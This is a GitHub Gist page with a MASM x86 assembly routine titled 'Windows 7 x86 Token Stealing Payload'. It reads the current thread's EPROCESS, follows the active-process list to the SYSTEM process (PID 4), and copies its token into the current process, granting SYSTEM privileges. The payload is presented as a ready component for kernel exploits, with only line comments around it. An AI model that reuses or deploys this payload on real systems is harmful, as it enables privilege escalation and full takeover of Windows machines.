Last active
June 4, 2020 05:49
-
-
Save achilles4828/f08ed747e7a6da81e29604f8460971d1 to your computer and use it in GitHub Desktop.
Windows 7 x86 Token Stealing Payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .386 | |
| .model flat, stdcall | |
| ASSUME FS:NOTHING | |
| .code | |
| PUBLIC get_token | |
| get_token PROC | |
| pushad; Save registers state | |
| ; Get pointer to _EPROCESS Structure | |
| xor eax, eax ; Set Zero | |
| mov eax, DWORD PTR fs:[KTHREAD_OFFSET] ; nt!_KPRC -> PrcbData -> CurrentThread | |
| mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD -> APCState -> Process | |
| mov ecx, eax ; Copy current _EPROCESS structure | |
| ; Get Current Process Token | |
| mov ebx, [eax + TOKEN] ; Copy current nt!_EPROCESS -> Token | |
| ; Assign System PID | |
| mov edx, SYSTEM_PID ; 0x004 | |
| ; GetSystemPID Loop Logic | |
| ; pprocess = current_process | |
| ; while pprocess->UniqueProcessId ! = SystemProcess->UniqueProcessId { | |
| ; pprocess = pprocess->Flink | |
| ; } | |
| GetSystemPID: | |
| mov eax, [eax + FLINK_OFFSET] ; nt!_EPROCESS -> ActiveProcessLinks[0] -> Flink | |
| sub eax, FLINK_OFFSET ; Next Process | |
| cmp[eax + Unique_PID], edx ; Compare the Unique Process ID with 4 | |
| jne GetSystemPID | |
| mov edx, [eax + TOKEN] ; Copy SYSTEM process nt!_EPRCOESS -> Token | |
| mov[ecx + TOKEN], edx ; Copy token of system to current process | |
| popad; Restore Registers state | |
| ; stack_alignment | |
| get_token ENDP | |
| END |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment